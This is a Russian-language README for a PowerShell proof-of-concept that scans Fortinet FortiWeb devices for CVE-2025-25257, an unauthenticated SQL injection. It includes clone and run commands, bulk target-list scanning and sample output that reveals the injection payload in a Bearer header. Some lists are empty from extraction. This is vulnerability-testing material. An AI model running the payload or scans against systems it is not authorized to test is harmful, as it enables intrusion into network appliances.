
CVE-2025-25257 PoC для использования в образовательных целях и/или авторизованного тестирования на проникновение.
Этот PowerShell-скрипт предназначен только для авторизованного тестирования на проникновение. Он проверяет устройства Fortinet FortiWeb на наличие CVE-2025-25257, неаутентифицированной уязвимости SQL-инъекции в конечной точке /api/fabric/device/status.
Скрипт:
Важное предупреждение:
Этот инструмент предназначен исключительно для этического, авторизованного использования в сценариях тестирования на проникновение или оценки уязвимостей. Несанкционированное использование может нарушать такие законы, как Computer Fraud and Abuse Act (CFAA), или аналогичные нормативные акты вашей юрисдикции. Убедитесь, что у вас есть явное разрешение владельца цели перед запуском этого скрипта. Автор не несёт ответственности за неправомерное использование.
Invoke-WebRequest.git clone https://github.com/mr-r3b00t/CVE-2025-25257.git
cd CVE-2025-25257
Скрипт находится в файле script.ps1.
Запустите скрипт в PowerShell с одним из следующих вариантов:
Укажите одиночный IP-адрес или DNS-имя, при необходимости с портом (например, 192.168.1.1:443).
.\script.ps1 -Target "192.168.1.1:443"
Или без порта (сканируются порты по умолчанию):
.\script.ps1 -Target "example.com"
Укажите текстовый файл с одной целью на строку (например, targets.txt).
.\script.ps1 -InputFile "targets.txt"
Пример содержимого targets.txt:
192.168.1.1:443
example.com
10.0.0.1
Скрипт выводит результаты для каждой цели и порта, включая:
Пример вывода:
Testing https://192.168.1.1:443/api/fabric/device/status for CVE-2025-25257
Endpoint accessible (HEAD 200 OK). Proceeding with GET request for vulnerability test.
GET Response Status: 200
Potential vulnerability detected (200 OK with payload). Check content for confirmation.
GET Response Content: {"devices": [...]}
Authorization (Bearer AAAAAA'or'1'='1).Вклад приветствуется! Сделайте форк репозитория и отправьте pull request с улучшениями, исправлениями ошибок или дополнительными функциями.
Этот проект распространяется под лицензией MIT — подробности см. в файле LICENSE.
По вопросам или проблемам открывайте issue на GitHub.